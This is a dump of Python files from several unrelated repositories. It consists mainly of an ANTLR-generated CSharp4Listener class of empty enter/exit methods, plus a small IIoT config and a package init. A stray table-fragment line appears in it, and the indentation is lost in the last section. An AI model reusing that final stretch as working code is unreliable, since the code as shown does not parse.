            except SQLAlchemyError as e:
                print(e)
        self.session.commit()
# rasp_car_PCA9685/__init__.py, from IsmoilovMuhriddin/Adafruit_Python_PCA9685 (MIT license)
from .PCA9685 import PCA9685
# Cluster member/meta_data.py, from wanglabmccc/iiot_project (MIT license)
DEVICE_ID = "sta04"
IIOT_SERVER_ADDR = "140.113.179.7"
NTP_SERVER_ADDR = "140.113.179.7"
# src/pyensae/languages/CSharp4Listener.py, from mohamedelkansouli/Ensae_py2 (MIT license)
] | null | null | null | # Generated from \CSharp4.g4 by ANTLR 4.7
from antlr4 import *
if __name__ is not None and "." in __name__:
    from .CSharp4Parser import CSharp4Parser
else:
    from CSharp4Parser import CSharp4Parser
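The generated class below is pure boilerplate following ANTLR's enter/exit listener convention: a tree walker calls `enterX` before visiting a node's children and `exitX` after. That traversal contract can be sketched in plain Python with no antlr4 dependency; every name in this sketch (`Node`, `Listener`, `walk`) is illustrative, not part of the ANTLR runtime:

```python
# Generic sketch of the enter/exit listener pattern used by ANTLR-generated
# listeners: depth-first walk, firing enter before children and exit after.
class Node:
    def __init__(self, name, children=()):
        self.name = name
        self.children = list(children)

class Listener:
    def __init__(self):
        self.events = []
    def enter(self, node):
        self.events.append(('enter', node.name))
    def exit(self, node):
        self.events.append(('exit', node.name))

def walk(listener, node):
    listener.enter(node)          # fired before the children
    for child in node.children:
        walk(listener, child)     # depth-first recursion
    listener.exit(node)           # fired after the children

tree = Node('root', [Node('a'), Node('b')])
listener = Listener()
walk(listener, tree)
# events: enter root, enter a, exit a, enter b, exit b, exit root
```

A generated subclass overrides only the `enterX`/`exitX` methods it cares about; the rest stay as `pass`, which is why the class below is safe to use as a base.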
# This class defines a complete listener for a parse tree produced by CSharp4Parser.
class CSharp4Listener(ParseTreeListener):

    # Enter a parse tree produced by CSharp4Parser#namespace_name.
    def enterNamespace_name(self, ctx: CSharp4Parser.Namespace_nameContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#namespace_name.
    def exitNamespace_name(self, ctx: CSharp4Parser.Namespace_nameContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#type_name.
    def enterType_name(self, ctx: CSharp4Parser.Type_nameContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#type_name.
    def exitType_name(self, ctx: CSharp4Parser.Type_nameContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#identifier.
    def enterIdentifier(self, ctx: CSharp4Parser.IdentifierContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#identifier.
    def exitIdentifier(self, ctx: CSharp4Parser.IdentifierContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#namespace_or_type_name.
    def enterNamespace_or_type_name(self, ctx: CSharp4Parser.Namespace_or_type_nameContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#namespace_or_type_name.
    def exitNamespace_or_type_name(self, ctx: CSharp4Parser.Namespace_or_type_nameContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#type_argument_list_opt.
    def enterType_argument_list_opt(self, ctx: CSharp4Parser.Type_argument_list_optContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#type_argument_list_opt.
    def exitType_argument_list_opt(self, ctx: CSharp4Parser.Type_argument_list_optContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#any_type.
    def enterAny_type(self, ctx: CSharp4Parser.Any_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#any_type.
    def exitAny_type(self, ctx: CSharp4Parser.Any_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#base_type.
    def enterBase_type(self, ctx: CSharp4Parser.Base_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#base_type.
    def exitBase_type(self, ctx: CSharp4Parser.Base_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#simple_type.
    def enterSimple_type(self, ctx: CSharp4Parser.Simple_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#simple_type.
    def exitSimple_type(self, ctx: CSharp4Parser.Simple_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#numeric_type.
    def enterNumeric_type(self, ctx: CSharp4Parser.Numeric_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#numeric_type.
    def exitNumeric_type(self, ctx: CSharp4Parser.Numeric_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#integral_type.
    def enterIntegral_type(self, ctx: CSharp4Parser.Integral_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#integral_type.
    def exitIntegral_type(self, ctx: CSharp4Parser.Integral_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#floating_point_type.
    def enterFloating_point_type(self, ctx: CSharp4Parser.Floating_point_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#floating_point_type.
    def exitFloating_point_type(self, ctx: CSharp4Parser.Floating_point_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#nullable_type.
    def enterNullable_type(self, ctx: CSharp4Parser.Nullable_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#nullable_type.
    def exitNullable_type(self, ctx: CSharp4Parser.Nullable_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#non_nullable_value_type.
    def enterNon_nullable_value_type(self, ctx: CSharp4Parser.Non_nullable_value_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#non_nullable_value_type.
    def exitNon_nullable_value_type(self, ctx: CSharp4Parser.Non_nullable_value_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#reference_type.
    def enterReference_type(self, ctx: CSharp4Parser.Reference_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#reference_type.
    def exitReference_type(self, ctx: CSharp4Parser.Reference_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#class_type.
    def enterClass_type(self, ctx: CSharp4Parser.Class_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#class_type.
    def exitClass_type(self, ctx: CSharp4Parser.Class_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#interface_type.
    def enterInterface_type(self, ctx: CSharp4Parser.Interface_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#interface_type.
    def exitInterface_type(self, ctx: CSharp4Parser.Interface_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#delegate_type.
    def enterDelegate_type(self, ctx: CSharp4Parser.Delegate_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#delegate_type.
    def exitDelegate_type(self, ctx: CSharp4Parser.Delegate_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#type_argument_list.
    def enterType_argument_list(self, ctx: CSharp4Parser.Type_argument_listContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#type_argument_list.
    def exitType_argument_list(self, ctx: CSharp4Parser.Type_argument_listContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#type_arguments.
    def enterType_arguments(self, ctx: CSharp4Parser.Type_argumentsContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#type_arguments.
    def exitType_arguments(self, ctx: CSharp4Parser.Type_argumentsContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#type_argument.
    def enterType_argument(self, ctx: CSharp4Parser.Type_argumentContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#type_argument.
    def exitType_argument(self, ctx: CSharp4Parser.Type_argumentContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#type_void.
    def enterType_void(self, ctx: CSharp4Parser.Type_voidContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#type_void.
    def exitType_void(self, ctx: CSharp4Parser.Type_voidContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#variable_reference.
    def enterVariable_reference(self, ctx: CSharp4Parser.Variable_referenceContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#variable_reference.
    def exitVariable_reference(self, ctx: CSharp4Parser.Variable_referenceContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#argument_list.
    def enterArgument_list(self, ctx: CSharp4Parser.Argument_listContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#argument_list.
    def exitArgument_list(self, ctx: CSharp4Parser.Argument_listContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#argument.
    def enterArgument(self, ctx: CSharp4Parser.ArgumentContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#argument.
    def exitArgument(self, ctx: CSharp4Parser.ArgumentContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#argument_name.
    def enterArgument_name(self, ctx: CSharp4Parser.Argument_nameContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#argument_name.
    def exitArgument_name(self, ctx: CSharp4Parser.Argument_nameContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#argument_value.
    def enterArgument_value(self, ctx: CSharp4Parser.Argument_valueContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#argument_value.
    def exitArgument_value(self, ctx: CSharp4Parser.Argument_valueContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#primary_expression.
    def enterPrimary_expression(self, ctx: CSharp4Parser.Primary_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#primary_expression.
    def exitPrimary_expression(self, ctx: CSharp4Parser.Primary_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#primary_expression_start.
    def enterPrimary_expression_start(self, ctx: CSharp4Parser.Primary_expression_startContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#primary_expression_start.
    def exitPrimary_expression_start(self, ctx: CSharp4Parser.Primary_expression_startContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#bracket_expression.
    def enterBracket_expression(self, ctx: CSharp4Parser.Bracket_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#bracket_expression.
    def exitBracket_expression(self, ctx: CSharp4Parser.Bracket_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#simple_name.
    def enterSimple_name(self, ctx: CSharp4Parser.Simple_nameContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#simple_name.
    def exitSimple_name(self, ctx: CSharp4Parser.Simple_nameContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#parenthesized_expression.
    def enterParenthesized_expression(self, ctx: CSharp4Parser.Parenthesized_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#parenthesized_expression.
    def exitParenthesized_expression(self, ctx: CSharp4Parser.Parenthesized_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#member_access.
    def enterMember_access(self, ctx: CSharp4Parser.Member_accessContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#member_access.
    def exitMember_access(self, ctx: CSharp4Parser.Member_accessContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#predefined_type.
    def enterPredefined_type(self, ctx: CSharp4Parser.Predefined_typeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#predefined_type.
    def exitPredefined_type(self, ctx: CSharp4Parser.Predefined_typeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#expression_list.
    def enterExpression_list(self, ctx: CSharp4Parser.Expression_listContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#expression_list.
    def exitExpression_list(self, ctx: CSharp4Parser.Expression_listContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#this_access.
    def enterThis_access(self, ctx: CSharp4Parser.This_accessContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#this_access.
    def exitThis_access(self, ctx: CSharp4Parser.This_accessContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#base_access.
    def enterBase_access(self, ctx: CSharp4Parser.Base_accessContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#base_access.
    def exitBase_access(self, ctx: CSharp4Parser.Base_accessContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#object_creation_expression.
    def enterObject_creation_expression(self, ctx: CSharp4Parser.Object_creation_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#object_creation_expression.
    def exitObject_creation_expression(self, ctx: CSharp4Parser.Object_creation_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#object_or_collection_initializer.
    def enterObject_or_collection_initializer(self, ctx: CSharp4Parser.Object_or_collection_initializerContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#object_or_collection_initializer.
    def exitObject_or_collection_initializer(self, ctx: CSharp4Parser.Object_or_collection_initializerContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#object_initializer.
    def enterObject_initializer(self, ctx: CSharp4Parser.Object_initializerContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#object_initializer.
    def exitObject_initializer(self, ctx: CSharp4Parser.Object_initializerContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#member_initializer_list.
    def enterMember_initializer_list(self, ctx: CSharp4Parser.Member_initializer_listContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#member_initializer_list.
    def exitMember_initializer_list(self, ctx: CSharp4Parser.Member_initializer_listContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#member_initializer.
    def enterMember_initializer(self, ctx: CSharp4Parser.Member_initializerContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#member_initializer.
    def exitMember_initializer(self, ctx: CSharp4Parser.Member_initializerContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#initializer_value.
    def enterInitializer_value(self, ctx: CSharp4Parser.Initializer_valueContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#initializer_value.
    def exitInitializer_value(self, ctx: CSharp4Parser.Initializer_valueContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#collection_initializer.
    def enterCollection_initializer(self, ctx: CSharp4Parser.Collection_initializerContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#collection_initializer.
    def exitCollection_initializer(self, ctx: CSharp4Parser.Collection_initializerContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#element_initializer_list.
    def enterElement_initializer_list(self, ctx: CSharp4Parser.Element_initializer_listContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#element_initializer_list.
    def exitElement_initializer_list(self, ctx: CSharp4Parser.Element_initializer_listContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#element_initializer.
    def enterElement_initializer(self, ctx: CSharp4Parser.Element_initializerContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#element_initializer.
    def exitElement_initializer(self, ctx: CSharp4Parser.Element_initializerContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#array_creation_expression.
    def enterArray_creation_expression(self, ctx: CSharp4Parser.Array_creation_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#array_creation_expression.
    def exitArray_creation_expression(self, ctx: CSharp4Parser.Array_creation_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#delegate_creation_expression.
    def enterDelegate_creation_expression(self, ctx: CSharp4Parser.Delegate_creation_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#delegate_creation_expression.
    def exitDelegate_creation_expression(self, ctx: CSharp4Parser.Delegate_creation_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#anonymous_object_creation_expression.
    def enterAnonymous_object_creation_expression(self, ctx: CSharp4Parser.Anonymous_object_creation_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#anonymous_object_creation_expression.
    def exitAnonymous_object_creation_expression(self, ctx: CSharp4Parser.Anonymous_object_creation_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#anonymous_object_initializer.
    def enterAnonymous_object_initializer(self, ctx: CSharp4Parser.Anonymous_object_initializerContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#anonymous_object_initializer.
    def exitAnonymous_object_initializer(self, ctx: CSharp4Parser.Anonymous_object_initializerContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#member_declarator_list.
    def enterMember_declarator_list(self, ctx: CSharp4Parser.Member_declarator_listContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#member_declarator_list.
    def exitMember_declarator_list(self, ctx: CSharp4Parser.Member_declarator_listContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#member_declarator.
    def enterMember_declarator(self, ctx: CSharp4Parser.Member_declaratorContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#member_declarator.
    def exitMember_declarator(self, ctx: CSharp4Parser.Member_declaratorContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#typeof_expression.
    def enterTypeof_expression(self, ctx: CSharp4Parser.Typeof_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#typeof_expression.
    def exitTypeof_expression(self, ctx: CSharp4Parser.Typeof_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#unbound_type_name.
    def enterUnbound_type_name(self, ctx: CSharp4Parser.Unbound_type_nameContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#unbound_type_name.
    def exitUnbound_type_name(self, ctx: CSharp4Parser.Unbound_type_nameContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#generic_dimension_specifier.
    def enterGeneric_dimension_specifier(self, ctx: CSharp4Parser.Generic_dimension_specifierContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#generic_dimension_specifier.
    def exitGeneric_dimension_specifier(self, ctx: CSharp4Parser.Generic_dimension_specifierContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#commas.
    def enterCommas(self, ctx: CSharp4Parser.CommasContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#commas.
    def exitCommas(self, ctx: CSharp4Parser.CommasContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#checked_expression.
    def enterChecked_expression(self, ctx: CSharp4Parser.Checked_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#checked_expression.
    def exitChecked_expression(self, ctx: CSharp4Parser.Checked_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#unchecked_expression.
    def enterUnchecked_expression(self, ctx: CSharp4Parser.Unchecked_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#unchecked_expression.
    def exitUnchecked_expression(self, ctx: CSharp4Parser.Unchecked_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#default_value_expression.
    def enterDefault_value_expression(self, ctx: CSharp4Parser.Default_value_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#default_value_expression.
    def exitDefault_value_expression(self, ctx: CSharp4Parser.Default_value_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#unary_expression.
    def enterUnary_expression(self, ctx: CSharp4Parser.Unary_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#unary_expression.
    def exitUnary_expression(self, ctx: CSharp4Parser.Unary_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#scan_for_cast_generic_precedence.
    def enterScan_for_cast_generic_precedence(self, ctx: CSharp4Parser.Scan_for_cast_generic_precedenceContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#scan_for_cast_generic_precedence.
    def exitScan_for_cast_generic_precedence(self, ctx: CSharp4Parser.Scan_for_cast_generic_precedenceContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#cast_disambiguation_token.
    def enterCast_disambiguation_token(self, ctx: CSharp4Parser.Cast_disambiguation_tokenContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#cast_disambiguation_token.
    def exitCast_disambiguation_token(self, ctx: CSharp4Parser.Cast_disambiguation_tokenContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#pre_increment_expression.
    def enterPre_increment_expression(self, ctx: CSharp4Parser.Pre_increment_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#pre_increment_expression.
    def exitPre_increment_expression(self, ctx: CSharp4Parser.Pre_increment_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#pre_decrement_expression.
    def enterPre_decrement_expression(self, ctx: CSharp4Parser.Pre_decrement_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#pre_decrement_expression.
    def exitPre_decrement_expression(self, ctx: CSharp4Parser.Pre_decrement_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#cast_expression.
    def enterCast_expression(self, ctx: CSharp4Parser.Cast_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#cast_expression.
    def exitCast_expression(self, ctx: CSharp4Parser.Cast_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#multiplicative_expression.
    def enterMultiplicative_expression(self, ctx: CSharp4Parser.Multiplicative_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#multiplicative_expression.
    def exitMultiplicative_expression(self, ctx: CSharp4Parser.Multiplicative_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#additive_expression.
    def enterAdditive_expression(self, ctx: CSharp4Parser.Additive_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#additive_expression.
    def exitAdditive_expression(self, ctx: CSharp4Parser.Additive_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#shift_expression.
    def enterShift_expression(self, ctx: CSharp4Parser.Shift_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#shift_expression.
    def exitShift_expression(self, ctx: CSharp4Parser.Shift_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#relational_expression.
    def enterRelational_expression(self, ctx: CSharp4Parser.Relational_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#relational_expression.
    def exitRelational_expression(self, ctx: CSharp4Parser.Relational_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#scan_for_shift_generic_precedence.
    def enterScan_for_shift_generic_precedence(self, ctx: CSharp4Parser.Scan_for_shift_generic_precedenceContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#scan_for_shift_generic_precedence.
    def exitScan_for_shift_generic_precedence(self, ctx: CSharp4Parser.Scan_for_shift_generic_precedenceContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#shift_disambiguation_token.
    def enterShift_disambiguation_token(self, ctx: CSharp4Parser.Shift_disambiguation_tokenContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#shift_disambiguation_token.
    def exitShift_disambiguation_token(self, ctx: CSharp4Parser.Shift_disambiguation_tokenContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#isType.
    def enterIsType(self, ctx: CSharp4Parser.IsTypeContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#isType.
    def exitIsType(self, ctx: CSharp4Parser.IsTypeContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#is_disambiguation_token.
    def enterIs_disambiguation_token(self, ctx: CSharp4Parser.Is_disambiguation_tokenContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#is_disambiguation_token.
    def exitIs_disambiguation_token(self, ctx: CSharp4Parser.Is_disambiguation_tokenContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#equality_expression.
    def enterEquality_expression(self, ctx: CSharp4Parser.Equality_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#equality_expression.
    def exitEquality_expression(self, ctx: CSharp4Parser.Equality_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#and_expression.
    def enterAnd_expression(self, ctx: CSharp4Parser.And_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#and_expression.
    def exitAnd_expression(self, ctx: CSharp4Parser.And_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#exclusive_or_expression.
    def enterExclusive_or_expression(self, ctx: CSharp4Parser.Exclusive_or_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#exclusive_or_expression.
    def exitExclusive_or_expression(self, ctx: CSharp4Parser.Exclusive_or_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#inclusive_or_expression.
    def enterInclusive_or_expression(self, ctx: CSharp4Parser.Inclusive_or_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#inclusive_or_expression.
    def exitInclusive_or_expression(self, ctx: CSharp4Parser.Inclusive_or_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#conditional_and_expression.
    def enterConditional_and_expression(self, ctx: CSharp4Parser.Conditional_and_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#conditional_and_expression.
    def exitConditional_and_expression(self, ctx: CSharp4Parser.Conditional_and_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#conditional_or_expression.
    def enterConditional_or_expression(self, ctx: CSharp4Parser.Conditional_or_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#conditional_or_expression.
    def exitConditional_or_expression(self, ctx: CSharp4Parser.Conditional_or_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#null_coalescing_expression.
    def enterNull_coalescing_expression(self, ctx: CSharp4Parser.Null_coalescing_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#null_coalescing_expression.
    def exitNull_coalescing_expression(self, ctx: CSharp4Parser.Null_coalescing_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#conditional_expression.
    def enterConditional_expression(self, ctx: CSharp4Parser.Conditional_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#conditional_expression.
    def exitConditional_expression(self, ctx: CSharp4Parser.Conditional_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#lambda_expression.
    def enterLambda_expression(self, ctx: CSharp4Parser.Lambda_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#lambda_expression.
    def exitLambda_expression(self, ctx: CSharp4Parser.Lambda_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#anonymous_method_expression.
    def enterAnonymous_method_expression(self, ctx: CSharp4Parser.Anonymous_method_expressionContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#anonymous_method_expression.
    def exitAnonymous_method_expression(self, ctx: CSharp4Parser.Anonymous_method_expressionContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#anonymous_function_signature.
    def enterAnonymous_function_signature(self, ctx: CSharp4Parser.Anonymous_function_signatureContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#anonymous_function_signature.
    def exitAnonymous_function_signature(self, ctx: CSharp4Parser.Anonymous_function_signatureContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#explicit_anonymous_function_signature.
    def enterExplicit_anonymous_function_signature(self, ctx: CSharp4Parser.Explicit_anonymous_function_signatureContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#explicit_anonymous_function_signature.
    def exitExplicit_anonymous_function_signature(self, ctx: CSharp4Parser.Explicit_anonymous_function_signatureContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter_list.
    def enterExplicit_anonymous_function_parameter_list(self, ctx: CSharp4Parser.Explicit_anonymous_function_parameter_listContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter_list.
    def exitExplicit_anonymous_function_parameter_list(self, ctx: CSharp4Parser.Explicit_anonymous_function_parameter_listContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter.
    def enterExplicit_anonymous_function_parameter(self, ctx: CSharp4Parser.Explicit_anonymous_function_parameterContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter.
    def exitExplicit_anonymous_function_parameter(self, ctx: CSharp4Parser.Explicit_anonymous_function_parameterContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#anonymous_function_parameter_modifier.
    def enterAnonymous_function_parameter_modifier(self, ctx: CSharp4Parser.Anonymous_function_parameter_modifierContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#anonymous_function_parameter_modifier.
    def exitAnonymous_function_parameter_modifier(self, ctx: CSharp4Parser.Anonymous_function_parameter_modifierContext):
        pass

    # Enter a parse tree produced by CSharp4Parser#implicit_anonymous_function_signature.
    def enterImplicit_anonymous_function_signature(self, ctx: CSharp4Parser.Implicit_anonymous_function_signatureContext):
        pass

    # Exit a parse tree produced by CSharp4Parser#implicit_anonymous_function_signature.
def exitImplicit_anonymous_function_signature(self, ctx: CSharp4Parser.Implicit_anonymous_function_signatureContext):
pass
# Enter a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter_list.
def enterImplicit_anonymous_function_parameter_list(self, ctx: CSharp4Parser.Implicit_anonymous_function_parameter_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter_list.
def exitImplicit_anonymous_function_parameter_list(self, ctx: CSharp4Parser.Implicit_anonymous_function_parameter_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter.
def enterImplicit_anonymous_function_parameter(self, ctx: CSharp4Parser.Implicit_anonymous_function_parameterContext):
pass
# Exit a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter.
def exitImplicit_anonymous_function_parameter(self, ctx: CSharp4Parser.Implicit_anonymous_function_parameterContext):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_function_body.
def enterAnonymous_function_body(self, ctx: CSharp4Parser.Anonymous_function_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_function_body.
def exitAnonymous_function_body(self, ctx: CSharp4Parser.Anonymous_function_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#query_expression.
def enterQuery_expression(self, ctx: CSharp4Parser.Query_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#query_expression.
def exitQuery_expression(self, ctx: CSharp4Parser.Query_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#from_clause.
def enterFrom_clause(self, ctx: CSharp4Parser.From_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#from_clause.
def exitFrom_clause(self, ctx: CSharp4Parser.From_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#query_body.
def enterQuery_body(self, ctx: CSharp4Parser.Query_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#query_body.
def exitQuery_body(self, ctx: CSharp4Parser.Query_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#query_body_clauses.
def enterQuery_body_clauses(self, ctx: CSharp4Parser.Query_body_clausesContext):
pass
